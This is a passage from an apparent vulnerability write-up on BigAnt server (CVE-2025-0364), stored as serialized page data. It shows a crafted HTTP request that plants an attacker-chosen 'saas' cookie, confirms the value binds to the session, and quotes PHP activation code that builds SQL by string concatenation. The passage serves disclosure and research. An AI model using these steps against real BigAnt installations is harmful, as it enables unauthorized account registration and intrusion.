class":1375,"line":9962},[1373,50121,50072],{"class":34505},[1373,50123,4667],{"class":1397},[1373,50125,50077],{"class":7297},[1373,50127,1384],{"class":1383},[1373,50129,1388],{"class":1387},[1373,50131,50132],{"class":1391},"metaTitle",[1373,50134,1388],{"class":1387},[1373,50136,5437],{"class":1383},[1373,50138,50139],{"class":7297},"C",[1373,50141,1384],{"class":1383},[1373,50143,1388],{"class":1387},[1373,50145,50146],{"class":1391},"PRODUCT_NAME",[1373,50148,1388],{"class":1387},[1373,50150,2230],{"class":1383},[1373,50152,1398],{"class":1397},[1373,50154,4713],{"class":1387},[1373,50156,4713],{"class":1387},[1373,50158,1398],{"class":1397},[1373,50160,47275],{"class":7297},[1373,50162,1384],{"class":1383},[1373,50164,1388],{"class":1387},[1373,50166,50167],{"class":1391},"_LOGIN_TITLE_",[1373,50169,1388],{"class":1387},[1373,50171,27548],{"class":1383},[1373,50173,47289],{"class":1383},[1373,50175,50176,50178,50180,50182,50184,50186,50188,50190,50192,50194,50196],{"class":1375,"line":15955},[1373,50177,50072],{"class":34505},[1373,50179,4667],{"class":1397},[1373,50181,50077],{"class":7297},[1373,50183,1384],{"class":1383},[1373,50185,1388],{"class":1387},[1373,50187,49646],{"class":1391},[1373,50189,1388],{"class":1387},[1373,50191,47335],{"class":1383},[1373,50193,49646],{"class":4640},[1373,50195,2230],{"class":1383},[1373,50197,47289],{"class":1383},[1373,50199,50200,50202,50204,50206,50208,50210,50212,50214,50216,50218,50220],{"class":1375,"line":16030},[1373,50201,50072],{"class":34505},[1373,50203,4667],{"class":1397},[1373,50205,50077],{"class":7297},[1373,50207,1384],{"class":1383},[1373,50209,1388],{"class":1387},[1373,50211,49687],{"class":1391},[1373,50213,1388],{"class":1387},[1373,50215,47335],{"class":1383},[1373,50217,49687],{"class":4640},[1373,50219,2230],{"class":1383},[1373,50221,47289],{"class":1383},[1373,50223,50224],{"class":1375,"line":16035},[1373,50225,47181],{"class":4640},[1373,50227,50228,50230,50232,50234,50236,50238,50241,50243],{"class":1375,"line":16083},[1373,50229,4695],{"class":4636},[1373,50231,1384],{"class":1383},[1373,50233,14056],{"class":7297},[1373,50235,1384],{"class":1383},[1373,50237,1388],{"class":1387},[1373,50239,50240],{"class":1391},"flag",[1373,50242,1388],{"class":1387},[1373,50244,50245],{"class":1383},")){\n",[1373,50247,50248,50250,50252,50254,50256,50258,50260,50262,50264,50266,50268,50270,50272,50274,50276],{"class":1375,"line":16098},[1373,50249,47549],{"class":34505},[1373,50251,4667],{"class":1397},[1373,50253,50077],{"class":7297},[1373,50255,1384],{"class":1383},[1373,50257,1388],{"class":1387},[1373,50259,50240],{"class":1391},[1373,50261,1388],{"class":1387},[1373,50263,5437],{"class":1383},[1373,50265,14056],{"class":7297},[1373,50267,1384],{"class":1383},[1373,50269,1388],{"class":1387},[1373,50271,50240],{"class":1391},[1373,50273,1388],{"class":1387},[1373,50275,27548],{"class":1383},[1373,50277,47289],{"class":1383},[1373,50279,50280],{"class":1375,"line":16103},[1373,50281,4795],{"class":1383},[18,50283,50284,50285,50287,50288,50290,50291,50294],{},"In summary, the main login page index function will look for an assigned ",[886,50286,48888],{}," session, if none is found it will look for a cookie named ",[886,50289,48888],{}," and assign (via ",[886,50292,50293],{},"$this->assign()",") any matching SaaS organization set in that cookie to the session.",[18,50296,50297,50298,50301],{},"In order to test this we can request the login page with a ",[886,50299,50300],{},"saas=aaa"," cookie set in a new session:",[1354,50303,50305],{"className":8228,"code":50304,"language":8230,"meta":219,"style":219},"GET \u002Findex.php\u002FHome\u002FLogin\u002Findex.html HTTP\u002F1.1\nHost: 10.0.0.104:8000\nAccept-Language: en-US,en;q=0.9\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F129.0.6668.71 Safari\u002F537.36\nAccept: text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,image\u002Fapng,*\u002F*;q=0.8,application\u002Fsigned-exchange;v=b3;q=0.7\nAccept-Encoding: gzip, deflate, br\nConnection: keep-alive\nCookie: saas=aaa\n\n\n",[886,50306,50307,50312,50317,50322,50327,50332,50337,50342,50347],{"__ignoreMap":219},[1373,50308,50309],{"class":1375,"line":1376},[1373,50310,50311],{"class":4640},"GET \u002Findex.php\u002FHome\u002FLogin\u002Findex.html HTTP\u002F1.1\n",[1373,50313,50314],{"class":1375,"line":220},[1373,50315,50316],{"class":4640},"Host: 10.0.0.104:8000\n",[1373,50318,50319],{"class":1375,"line":1266},[1373,50320,50321],{"class":4640},"Accept-Language: en-US,en;q=0.9\n",[1373,50323,50324],{"class":1375,"line":1852},[1373,50325,50326],{"class":4640},"Upgrade-Insecure-Requests: 1\n",[1373,50328,50329],{"class":1375,"line":4692},[1373,50330,50331],{"class":4640},"User-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F129.0.6668.71 Safari\u002F537.36\n",[1373,50333,50334],{"class":1375,"line":4724},[1373,50335,50336],{"class":4640},"Accept: text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,image\u002Fapng,*\u002F*;q=0.8,application\u002Fsigned-exchange;v=b3;q=0.7\n",[1373,50338,50339],{"class":1375,"line":4756},[1373,50340,50341],{"class":4640},"Accept-Encoding: gzip, deflate, br\n",[1373,50343,50344],{"class":1375,"line":4768},[1373,50345,50346],{"class":4640},"Connection: keep-alive\n",[1373,50348,50349],{"class":1375,"line":4792},[1373,50350,50351],{"class":4640},"Cookie: saas=aaa\n",[18,50353,50354,50355,50357],{},"Then, take the session cookie from the above request and revisit the demo page to trigger the ",[886,50356,49446],{}," output:",[18,50359,50360],{},[68,50361],{"alt":50362,"src":50363,":width":10862},"BigAnt demo page with attacker controlled SaaS","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-5-demo-page-fixed-saas.png",[18,50365,50366,50367,50369,50370,50372],{},"Bingo. We have tied the ",[886,50368,48888],{}," that we registered to our controlled value for the session and was able to successfully retrieve the ",[886,50371,49446],{}," value.",[18,50374,50375,50376,4606],{},"All that's left is to verify the original hypothesis and attempt to complete the registration of the SaaS organization. The core function for registration activation lives in ",[886,50377,50378],{},"Application\u002FHome\u002FController\u002FSaasController.class.php:411",[1354,50380,50382],{"className":1367,"code":50381,"language":1369,"meta":219,"style":219},"\u002F**\n * 激活SAAS\n * 1、获得SAAS\n * 2、判断是否超时\n * 3、判断是否激活\n * 4、激活SAAS\n *\u002F\nfunction reg_activation(){\n $saasId = I('saas_id');\n \n $M = D('Common\u002FSaas');\n $info = $M->find($saasId) ;\n \n \u002F\u002F判断是否有数据\n if (!$info){\n $this->error(L('_ACTIVATION_ERROR_NODATA_')) ;\n }\n \n \u002F\u002F判断是否已经激活了\n if ($info['saas_status']){\n $this->error(L('_ACTIVATION_ERROR_ALREALY_')) ;\n }\n \n \u002F\u002F判断是否过期\n if ($M->isExpire($info['saas_create_date'])){\n $this->error(L('_ACTIVATION_ERROR_EXPIRE_')) ;\n }\n \n \u002F\u002F激活数据\n $saasName = $info['saas_name'] ;\n $res = $M->activationSaas($saasName) ;\n \n if ($res){\n $url = U('reg_complete',array('saas'=>$saasName));\n $this->success(L('_ACTIVATION_SUCCESS_'), $url);\n }else{\n $this->error(L('_ACTIVATION_ERROR_'));\n }\n}\n",[886,50383,50384,50388,50393,50398,50403,50408,50413,50417,50426,50447,50451,50471,50496,50500,50505,50520,50545,50549,50553,50558,50576,50601,50605,50609,50614,50643,50668,50672,50676,50681,50706,50732,50736,50746,50785,50814,50822,50845,50849],{"__ignoreMap":219},[1373,50385,50386],{"class":1375,"line":1376},[1373,50387,47086],{"class":4630},[1373,50389,50390],{"class":1375,"line":220},[1373,50391,50392],{"class":4630}," * 激活SAAS\n",[1373,50394,50395],{"class":1375,"line":1266},[1373,50396,50397],{"class":4630}," * 1、获得SAAS\n",[1373,50399,50400],{"class":1375,"line":1852},[1373,50401,50402],{"class":4630}," * 2、判断是否超时\n",[1373,50404,50405],{"class":1375,"line":4692},[1373,50406,50407],{"class":4630}," * 3、判断是否激活\n",[1373,50409,50410],{"class":1375,"line":4724},[1373,50411,50412],{"class":4630}," * 4、激活SAAS\n",[1373,50414,50415],{"class":1375,"line":4756},[1373,50416,47111],{"class":4630},[1373,50418,50419,50421,50424],{"class":1375,"line":4768},[1373,50420,8560],{"class":7293},[1373,50422,50423],{"class":7297}," reg_activation",[1373,50425,47121],{"class":1383},[1373,50427,50428,50430,50433,50435,50437,50439,50441,50443,50445],{"class":1375,"line":4792},[1373,50429,7362],{"class":1383},[1373,50431,50432],{"class":4640},"saasId ",[1373,50434,5417],{"class":1397},[1373,50436,49639],{"class":7297},[1373,50438,1384],{"class":1383},[1373,50440,1388],{"class":1387},[1373,50442,47076],{"class":1391},[1373,50444,1388],{"class":1387},[1373,50446,4680],{"class":1383},[1373,50448,50449],{"class":1375,"line":4798},[1373,50450,47181],{"class":4640},[1373,50452,50453,50455,50457,50459,50461,50463,50465,50467,50469],{"class":1375,"line":4806},[1373,50454,7362],{"class":1383},[1373,50456,47697],{"class":4640},[1373,50458,5417],{"class":1397},[1373,50460,47702],{"class":7297},[1373,50462,1384],{"class":1383},[1373,50464,1388],{"class":1387},[1373,50466,47709],{"class":1391},[1373,50468,1388],{"class":1387},[1373,50470,4680],{"class":1383},[1373,50472,50473,50475,50478,50480,50482,50484,50486,50488,50490,50492,50494],{"class":1375,"line":4817},[1373,50474,7362],{"class":1383},[1373,50476,50477],{"class":4640},"info ",[1373,50479,5417],{"class":1397},[1373,50481,4656],{"class":1383},[1373,50483,47367],{"class":4640},[1373,50485,4667],{"class":1397},[1373,50487,47975],{"class":7297},[1373,50489,34467],{"class":1383},[1373,50491,47250],{"class":4640},[1373,50493,2230],{"class":1383},[1373,50495,47289],{"class":1383},[1373,50497,50498],{"class":1375,"line":4825},[1373,50499,47181],{"class":4640},[1373,50501,50502],{"class":1375,"line":4835},[1373,50503,50504],{"class":4630}," \u002F\u002F判断是否有数据\n",[1373,50506,50507,50509,50511,50513,50515,50518],{"class":1375,"line":4843},[1373,50508,4695],{"class":4636},[1373,50510,4641],{"class":1383},[1373,50512,16090],{"class":1397},[1373,50514,4644],{"class":1383},[1373,50516,50517],{"class":4640},"info",[1373,50519,47430],{"class":1383},[1373,50521,50522,50524,50526,50528,50530,50532,50534,50536,50539,50541,50543],{"class":1375,"line":4849},[1373,50523,47549],{"class":34505},[1373,50525,4667],{"class":1397},[1373,50527,10265],{"class":7297},[1373,50529,1384],{"class":1383},[1373,50531,13918],{"class":7297},[1373,50533,1384],{"class":1383},[1373,50535,1388],{"class":1387},[1373,50537,50538],{"class":1391},"_ACTIVATION_ERROR_NODATA_",[1373,50540,1388],{"class":1387},[1373,50542,27548],{"class":1383},[1373,50544,47289],{"class":1383},[1373,50546,50547],{"class":1375,"line":4877},[1373,50548,4795],{"class":1383},[1373,50550,50551],{"class":1375,"line":4915},[1373,50552,47181],{"class":4640},[1373,50554,50555],{"class":1375,"line":4931},[1373,50556,50557],{"class":4630}," \u002F\u002F判断是否已经激活了\n",[1373,50559,50560,50562,50564,50566,50568,50570,50572,50574],{"class":1375,"line":4947},[1373,50561,4695],{"class":4636},[1373,50563,47425],{"class":1383},[1373,50565,50517],{"class":4640},[1373,50567,7035],{"class":1383},[1373,50569,1388],{"class":1387},[1373,50571,47849],{"class":1391},[1373,50573,1388],{"class":1387},[1373,50575,47201],{"class":1383},[1373,50577,50578,50580,50582,50584,50586,50588,50590,50592,50595,50597,50599],{"class":1375,"line":4952},[1373,50579,47549],{"class":34505},[1373,50581,4667],{"class":1397},[1373,50583,10265],{"class":7297},[1373,50585,1384],{"class":1383},[1373,50587,13918],{"class":7297},[1373,50589,1384],{"class":1383},[1373,50591,1388],{"class":1387},[1373,50593,50594],{"class":1391},"_ACTIVATION_ERROR_ALREALY_",[1373,50596,1388],{"class":1387},[1373,50598,27548],{"class":1383},[1373,50600,47289],{"class":1383},[1373,50602,50603],{"class":1375,"line":6776},[1373,50604,4795],{"class":1383},[1373,50606,50607],{"class":1375,"line":6781},[1373,50608,47181],{"class":4640},[1373,50610,50611],{"class":1375,"line":7524},[1373,50612,50613],{"class":4630}," \u002F\u002F判断是否过期\n",[1373,50615,50616,50618,50620,50622,50624,50627,50629,50631,50633,50635,50638,50640],{"class":1375,"line":7530},[1373,50617,4695],{"class":4636},[1373,50619,47425],{"class":1383},[1373,50621,47367],{"class":4640},[1373,50623,4667],{"class":1397},[1373,50625,50626],{"class":7297},"isExpire",[1373,50628,34467],{"class":1383},[1373,50630,50517],{"class":4640},[1373,50632,7035],{"class":1383},[1373,50634,1388],{"class":1387},[1373,50636,50637],{"class":1391},"saas_create_date",[1373,50639,1388],{"class":1387},[1373,50641,50642],{"class":1383},"])){\n",[1373,50644,50645,50647,50649,50651,50653,50655,50657,50659,50662,50664,50666],{"class":1375,"line":7546},[1373,50646,47549],{"class":34505},[1373,50648,4667],{"class":1397},[1373,50650,10265],{"class":7297},[1373,50652,1384],{"class":1383},[1373,50654,13918],{"class":7297},[1373,50656,1384],{"class":1383},[1373,50658,1388],{"class":1387},[1373,50660,50661],{"class":1391},"_ACTIVATION_ERROR_EXPIRE_",[1373,50663,1388],{"class":1387},[1373,50665,27548],{"class":1383},[1373,50667,47289],{"class":1383},[1373,50669,50670],{"class":1375,"line":7571},[1373,50671,4795],{"class":1383},[1373,50673,50674],{"class":1375,"line":7598},[1373,50675,47181],{"class":4640},[1373,50677,50678],{"class":1375,"line":7615},[1373,50679,50680],{"class":4630}," \u002F\u002F激活数据\n",[1373,50682,50683,50685,50688,50690,50692,50694,50696,50698,50700,50702,50704],{"class":1375,"line":7635},[1373,50684,7362],{"class":1383},[1373,50686,50687],{"class":4640},"saasName ",[1373,50689,5417],{"class":1397},[1373,50691,4656],{"class":1383},[1373,50693,50517],{"class":4640},[1373,50695,7035],{"class":1383},[1373,50697,1388],{"class":1387},[1373,50699,46826],{"class":1391},[1373,50701,1388],{"class":1387},[1373,50703,15050],{"class":1383},[1373,50705,47289],{"class":1383},[1373,50707,50708,50710,50712,50714,50716,50718,50720,50723,50725,50728,50730],{"class":1375,"line":7640},[1373,50709,7362],{"class":1383},[1373,50711,47161],{"class":4640},[1373,50713,5417],{"class":1397},[1373,50715,4656],{"class":1383},[1373,50717,47367],{"class":4640},[1373,50719,4667],{"class":1397},[1373,50721,50722],{"class":7297},"activationSaas",[1373,50724,34467],{"class":1383},[1373,50726,50727],{"class":4640},"saasName",[1373,50729,2230],{"class":1383},[1373,50731,47289],{"class":1383},[1373,50733,50734],{"class":1375,"line":7648},[1373,50735,47181],{"class":4640},[1373,50737,50738,50740,50742,50744],{"class":1375,"line":7672},[1373,50739,4695],{"class":4636},[1373,50741,47425],{"class":1383},[1373,50743,47190],{"class":4640},[1373,50745,47430],{"class":1383},[1373,50747,50748,50750,50752,50754,50756,50758,50760,50763,50765,50767,50769,50771,50773,50775,50777,50779,50781,50783],{"class":1375,"line":7688},[1373,50749,4727],{"class":1383},[1373,50751,47208],{"class":4640},[1373,50753,5417],{"class":1397},[1373,50755,47220],{"class":7297},[1373,50757,1384],{"class":1383},[1373,50759,1388],{"class":1387},[1373,50761,50762],{"class":1391},"reg_complete",[1373,50764,1388],{"class":1387},[1373,50766,5437],{"class":1383},[1373,50768,47234],{"class":1379},[1373,50770,1384],{"class":1383},[1373,50772,1388],{"class":1387},[1373,50774,48888],{"class":1391},[1373,50776,1388],{"class":1387},[1373,50778,47245],{"class":1397},[1373,50780,4644],{"class":1383},[1373,50782,50727],{"class":4640},[1373,50784,1413],{"class":1383},[1373,50786,50787,50789,50791,50793,50795,50797,50799,50801,50804,50806,50808,50810,50812],{"class":1375,"line":7709},[1373,50788,47549],{"class":34505},[1373,50790,4667],{"class":1397},[1373,50792,16142],{"class":7297},[1373,50794,1384],{"class":1383},[1373,50796,13918],{"class":7297},[1373,50798,1384],{"class":1383},[1373,50800,1388],{"class":1387},[1373,50802,50803],{"class":1391},"_ACTIVATION_SUCCESS_",[1373,50805,1388],{"class":1387},[1373,50807,15534],{"class":1383},[1373,50809,4656],{"class":1383},[1373,50811,7585],{"class":4640},[1373,50813,4680],{"class":1383},[1373,50815,50816,50818,50820],{"class":1375,"line":7714},[1373,50817,28032],{"class":1383},[1373,50819,4762],{"class":4636},[1373,50821,8904],{"class":1383},[1373,50823,50824,50826,50828,50830,50832,50834,50836,50838,50841,50843],{"class":1375,"line":7722},[1373,50825,47549],{"class":34505},[1373,50827,4667],{"class":1397},[1373,50829,10265],{"class":7297},[1373,50831,1384],{"class":1383},[1373,50833,13918],{"class":7297},[1373,50835,1384],{"class":1383},[1373,50837,1388],{"class":1387},[1373,50839,50840],{"class":1391},"_ACTIVATION_ERROR_",[1373,50842,1388],{"class":1387},[1373,50844,1413],{"class":1383},[1373,50846,50847],{"class":1375,"line":9903},[1373,50848,4795],{"class":1383},[1373,50850,50851],{"class":1375,"line":9908},[1373,50852,1855],{"class":1383},[18,50854,50855,50856,50858,50859,50861,50862,50864,50865,4606],{},"If the activation data is correct and the ",[886,50857,47076],{}," is the same as the ",[886,50860,49446],{}," then this function calls ",[886,50863,50722],{}," in ",[886,50866,50867],{},"Application\u002FCommon\u002FModel\u002FSaasModel.class.php:146",[1354,50869,50871],{"className":1367,"code":50870,"language":1369,"meta":219,"style":219},"\u002F**\n * 激活SAAS\n * @param unknown $saasName 企业ID (在LINUX上安装的时候会出现SAASID变成1,不知道什么原因,所以这里用企业ID来判断)\n * @param unknown $password 明文密码 用于发邮件\n *\u002F\npublic function activationSaas($saasName){\n\n $where['saas_name'] = $saasName;\n $info = $this->where($where)->find();\n \n $saasId = $info['saas_id'];\n $saasName = $info['saas_name'];\n $dbName = $info['saas_dbname'];\n $adminPassword = $info['saas_pwd'];\n $installDate = $info['saas_installdate'] ;\n \n if (! $info){\n return false ;\n }\n \n \u002F\u002F创建数据库\n $res = $this->createDB($info);\n \n \u002F\u002F设置SAAS的服务关系\n if ($res){\n $M = D('Ms\u002Fserver');\n $server = $M->where(array('server_type',2))->find();\n \n if ($server){\n $serverId = $server['server_id'];\n $sql = \" insert into sys_saas_server(gid,saas_id,login_server_id,server_is_mast) values('\" . sp_get_guid(). \"','$saasId','$serverId',1)\" ;\n $M->db->execute($sql);\n }\n }\n \n \u002F\u002F更新状态\n $data['saas_status'] = 1 ;\n $data['saas_id'] = $saasId ;\n if (! $installDate){\n $data['saas_installdate'] = \\Common\\Lib\\AntCmd::getTryCode();\n $data['auth_numbers'] = \\Common\\Lib\\AntCmd::encrypt(50);\n $data['auth_expiredate'] = \\Common\\Lib\\AntCmd::encrypt(strtotime(date('Y-m-d H:i:s',strtotime('+15 day'))));\n }\n $this->save($data);\n \n \u002F\u002F发送邮件通知\n if ($this->is_send_activation_email){\n $this->sendMailNotify($info);\n }\n \n \n return true ;\n \n}\n",[886,50872,50873,50877,50881,50893,50904,50908,50923,50927,50951,50977,50981,51003,51025,51049,51072,51098,51102,51116,51124,51128,51132,51137,51158,51162,51167,51177,51198,51240,51245,51256,51280,51328,51350,51354,51358,51362,51367,51389,51413,51428,51466,51508,51578,51582,51597,51601,51606,51621,51636,51640,51644,51648,51656,51660],{"__ignoreMap":219},[1373,50874,50875],{"class":1375,"line":1376},[1373,50876,47086],{"class":4630},[1373,50878,50879],{"class":1375,"line":220},[1373,50880,50392],{"class":4630},[1373,50882,50883,50885,50887,50890],{"class":1375,"line":1266},[1373,50884,47618],{"class":4630},[1373,50886,47622],{"class":47621},[1373,50888,50889],{"class":47625}," unknown",[1373,50891,50892],{"class":4630}," $saasName 企业ID (在LINUX上安装的时候会出现SAASID变成1,不知道什么原因,所以这里用企业ID来判断)\n",[1373,50894,50895,50897,50899,50901],{"class":1375,"line":1852},[1373,50896,47618],{"class":4630},[1373,50898,47622],{"class":47621},[1373,50900,50889],{"class":47625},[1373,50902,50903],{"class":4630}," $password 明文密码 用于发邮件\n",[1373,50905,50906],{"class":1375,"line":4692},[1373,50907,47111],{"class":4630},[1373,50909,50910,50912,50914,50917,50919,50921],{"class":1375,"line":4724},[1373,50911,15019],{"class":4652},[1373,50913,49619],{"class":7293},[1373,50915,50916],{"class":7297}," activationSaas",[1373,50918,34467],{"class":1383},[1373,50920,50727],{"class":4640},[1373,50922,47430],{"class":1383},[1373,50924,50925],{"class":1375,"line":4756},[1373,50926,6520],{"emptyLinePlaceholder":237},[1373,50928,50929,50931,50933,50935,50937,50939,50941,50943,50945,50947,50949],{"class":1375,"line":4768},[1373,50930,7362],{"class":1383},[1373,50932,47926],{"class":4640},[1373,50934,7035],{"class":1383},[1373,50936,1388],{"class":1387},[1373,50938,46826],{"class":1391},[1373,50940,1388],{"class":1387},[1373,50942,15050],{"class":1383},[1373,50944,8575],{"class":1397},[1373,50946,4656],{"class":1383},[1373,50948,50727],{"class":4640},[1373,50950,4912],{"class":1383},[1373,50952,50953,50955,50957,50959,50961,50963,50965,50967,50969,50971,50973,50975],{"class":1375,"line":4792},[1373,50954,7362],{"class":1383},[1373,50956,50477],{"class":4640},[1373,50958,5417],{"class":1397},[1373,50960,35288],{"class":34505},[1373,50962,4667],{"class":1397},[1373,50964,47926],{"class":7297},[1373,50966,34467],{"class":1383},[1373,50968,47926],{"class":4640},[1373,50970,2230],{"class":1383},[1373,50972,4667],{"class":1397},[1373,50974,47975],{"class":7297},[1373,50976,15603],{"class":1383},[1373,50978,50979],{"class":1375,"line":4798},[1373,50980,47181],{"class":4640},[1373,50982,50983,50985,50987,50989,50991,50993,50995,50997,50999,51001],{"class":1375,"line":4806},[1373,50984,7362],{"class":1383},[1373,50986,50432],{"class":4640},[1373,50988,5417],{"class":1397},[1373,50990,4656],{"class":1383},[1373,50992,50517],{"class":4640},[1373,50994,7035],{"class":1383},[1373,50996,1388],{"class":1387},[1373,50998,47076],{"class":1391},[1373,51000,1388],{"class":1387},[1373,51002,34699],{"class":1383},[1373,51004,51005,51007,51009,51011,51013,51015,51017,51019,51021,51023],{"class":1375,"line":4817},[1373,51006,7362],{"class":1383},[1373,51008,50687],{"class":4640},[1373,51010,5417],{"class":1397},[1373,51012,4656],{"class":1383},[1373,51014,50517],{"class":4640},[1373,51016,7035],{"class":1383},[1373,51018,1388],{"class":1387},[1373,51020,46826],{"class":1391},[1373,51022,1388],{"class":1387},[1373,51024,34699],{"class":1383},[1373,51026,51027,51029,51032,51034,51036,51038,51040,51042,51045,51047],{"class":1375,"line":4825},[1373,51028,7362],{"class":1383},[1373,51030,51031],{"class":4640},"dbName ",[1373,51033,5417],{"class":1397},[1373,51035,4656],{"class":1383},[1373,51037,50517],{"class":4640},[1373,51039,7035],{"class":1383},[1373,51041,1388],{"class":1387},[1373,51043,51044],{"class":1391},"saas_dbname",[1373,51046,1388],{"class":1387},[1373,51048,34699],{"class":1383},[1373,51050,51051,51053,51056,51058,51060,51062,51064,51066,51068,51070],{"class":1375,"line":4835},[1373,51052,7362],{"class":1383},[1373,51054,51055],{"class":4640},"adminPassword ",[1373,51057,5417],{"class":1397},[1373,51059,4656],{"class":1383},[1373,51061,50517],{"class":4640},[1373,51063,7035],{"class":1383},[1373,51065,1388],{"class":1387},[1373,51067,47000],{"class":1391},[1373,51069,1388],{"class":1387},[1373,51071,34699],{"class":1383},[1373,51073,51074,51076,51079,51081,51083,51085,51087,51089,51092,51094,51096],{"class":1375,"line":4843},[1373,51075,7362],{"class":1383},[1373,51077,51078],{"class":4640},"installDate ",[1373,51080,5417],{"class":1397},[1373,51082,4656],{"class":1383},[1373,51084,50517],{"class":4640},[1373,51086,7035],{"class":1383},[1373,51088,1388],{"class":1387},[1373,51090,51091],{"class":1391},"saas_installdate",[1373,51093,1388],{"class":1387},[1373,51095,15050],{"class":1383},[1373,51097,47289],{"class":1383},[1373,51099,51100],{"class":1375,"line":4849},[1373,51101,47181],{"class":4640},[1373,51103,51104,51106,51108,51110,51112,51114],{"class":1375,"line":4877},[1373,51105,4695],{"class":4636},[1373,51107,4641],{"class":1383},[1373,51109,16090],{"class":1397},[1373,51111,4656],{"class":1383},[1373,51113,50517],{"class":4640},[1373,51115,47430],{"class":1383},[1373,51117,51118,51120,51122],{"class":1375,"line":4915},[1373,51119,4918],{"class":4636},[1373,51121,16311],{"class":7054},[1373,51123,47289],{"class":1383},[1373,51125,51126],{"class":1375,"line":4931},[1373,51127,4795],{"class":1383},[1373,51129,51130],{"class":1375,"line":4947},[1373,51131,47181],{"class":4640},[1373,51133,51134],{"class":1375,"line":4952},[1373,51135,51136],{"class":4630}," \u002F\u002F创建数据库\n",[1373,51138,51139,51141,51143,51145,51147,51149,51152,51154,51156],{"class":1375,"line":6776},[1373,51140,7362],{"class":1383},[1373,51142,47161],{"class":4640},[1373,51144,5417],{"class":1397},[1373,51146,35288],{"class":34505},[1373,51148,4667],{"class":1397},[1373,51150,51151],{"class":7297},"createDB",[1373,51153,34467],{"class":1383},[1373,51155,50517],{"class":4640},[1373,51157,4680],{"class":1383},[1373,51159,51160],{"class":1375,"line":6781},[1373,51161,47181],{"class":4640},[1373,51163,51164],{"class":1375,"line":7524},[1373,51165,51166],{"class":4630}," \u002F\u002F设置SAAS的服务关系\n",[1373,51168,51169,51171,51173,51175],{"class":1375,"line":7530},[1373,51170,4695],{"class":4636},[1373,51172,47425],{"class":1383},[1373,51174,47190],{"class":4640},[1373,51176,47430],{"class":1383},[1373,51178,51179,51181,51183,51185,51187,51189,51191,51194,51196],{"class":1375,"line":7546},[1373,51180,4727],{"class":1383},[1373,51182,47697],{"class":4640},[1373,51184,5417],{"class":1397},[1373,51186,47702],{"class":7297},[1373,51188,1384],{"class":1383},[1373,51190,1388],{"class":1387},[1373,51192,51193],{"class":1391},"Ms\u002Fserver",[1373,51195,1388],{"class":1387},[1373,51197,4680],{"class":1383},[1373,51199,51200,51202,51205,51207,51209,51211,51213,51215,51217,51219,51221,51223,51226,51228,51230,51232,51234,51236,51238],{"class":1375,"line":7571},[1373,51201,4727],{"class":1383},[1373,51203,51204],{"class":4640},"server ",[1373,51206,5417],{"class":1397},[1373,51208,4656],{"class":1383},[1373,51210,47367],{"class":4640},[1373,51212,4667],{"class":1397},[1373,51214,47926],{"class":7297},[1373,51216,1384],{"class":1383},[1373,51218,47234],{"class":1379},[1373,51220,1384],{"class":1383},[1373,51222,1388],{"class":1387},[1373,51224,51225],{"class":1391},"server_type",[1373,51227,1388],{"class":1387},[1373,51229,5437],{"class":1383},[1373,51231,353],{"class":5467},[1373,51233,27548],{"class":1383},[1373,51235,4667],{"class":1397},[1373,51237,47975],{"class":7297},[1373,51239,15603],{"class":1383},[1373,51241,51242],{"class":1375,"line":7598},[1373,51243,51244],{"class":4640}," \n",[1373,51246,51247,51249,51251,51254],{"class":1375,"line":7615},[1373,51248,9773],{"class":4636},[1373,51250,47425],{"class":1383},[1373,51252,51253],{"class":4640},"server",[1373,51255,47430],{"class":1383},[1373,51257,51258,51260,51263,51265,51267,51269,51271,51273,51276,51278],{"class":1375,"line":7635},[1373,51259,47435],{"class":1383},[1373,51261,51262],{"class":4640},"serverId ",[1373,51264,5417],{"class":1397},[1373,51266,4656],{"class":1383},[1373,51268,51253],{"class":4640},[1373,51270,7035],{"class":1383},[1373,51272,1388],{"class":1387},[1373,51274,51275],{"class":1391},"server_id",[1373,51277,1388],{"class":1387},[1373,51279,34699],{"class":1383},[1373,51281,51282,51284,51287,51289,51291,51294,51296,51298,51301,51303,51305,51307,51310,51312,51314,51316,51318,51321,51324,51326],{"class":1375,"line":7640},[1373,51283,47435],{"class":1383},[1373,51285,51286],{"class":4640},"sql ",[1373,51288,5417],{"class":1397},[1373,51290,4883],{"class":1387},[1373,51292,51293],{"class":1391}," insert into sys_saas_server(gid,saas_id,login_server_id,server_is_mast) values('",[1373,51295,183],{"class":1387},[1373,51297,1398],{"class":1397},[1373,51299,51300],{"class":7297}," sp_get_guid",[1373,51302,7514],{"class":1383},[1373,51304,59],{"class":1397},[1373,51306,4883],{"class":1387},[1373,51308,51309],{"class":1391},"','",[1373,51311,4644],{"class":1383},[1373,51313,47250],{"class":4640},[1373,51315,51309],{"class":1391},[1373,51317,4644],{"class":1383},[1373,51319,51320],{"class":4640},"serverId",[1373,51322,51323],{"class":1391},"',1)",[1373,51325,183],{"class":1387},[1373,51327,47289],{"class":1383},[1373,51329,51330,51332,51334,51336,51339,51341,51344,51346,51348],{"class":1375,"line":7648},[1373,51331,47435],{"class":1383},[1373,51333,47367],{"class":4640},[1373,51335,4667],{"class":1397},[1373,51337,51338],{"class":4640},"db",[1373,51340,4667],{"class":1397},[1373,51342,51343],{"class":7297},"execute",[1373,51345,34467],{"class":1383},[1373,51347,5374],{"class":4640},[1373,51349,4680],{"class":1383},[1373,51351,51352],{"class":1375,"line":7672},[1373,51353,9861],{"class":1383},[1373,51355,51356],{"class":1375,"line":7688},[1373,51357,4795],{"class":1383},[1373,51359,51360],{"class":1375,"line":7709},[1373,51361,47181],{"class":4640},[1373,51363,51364],{"class":1375,"line":7714},[1373,51365,51366],{"class":4630}," 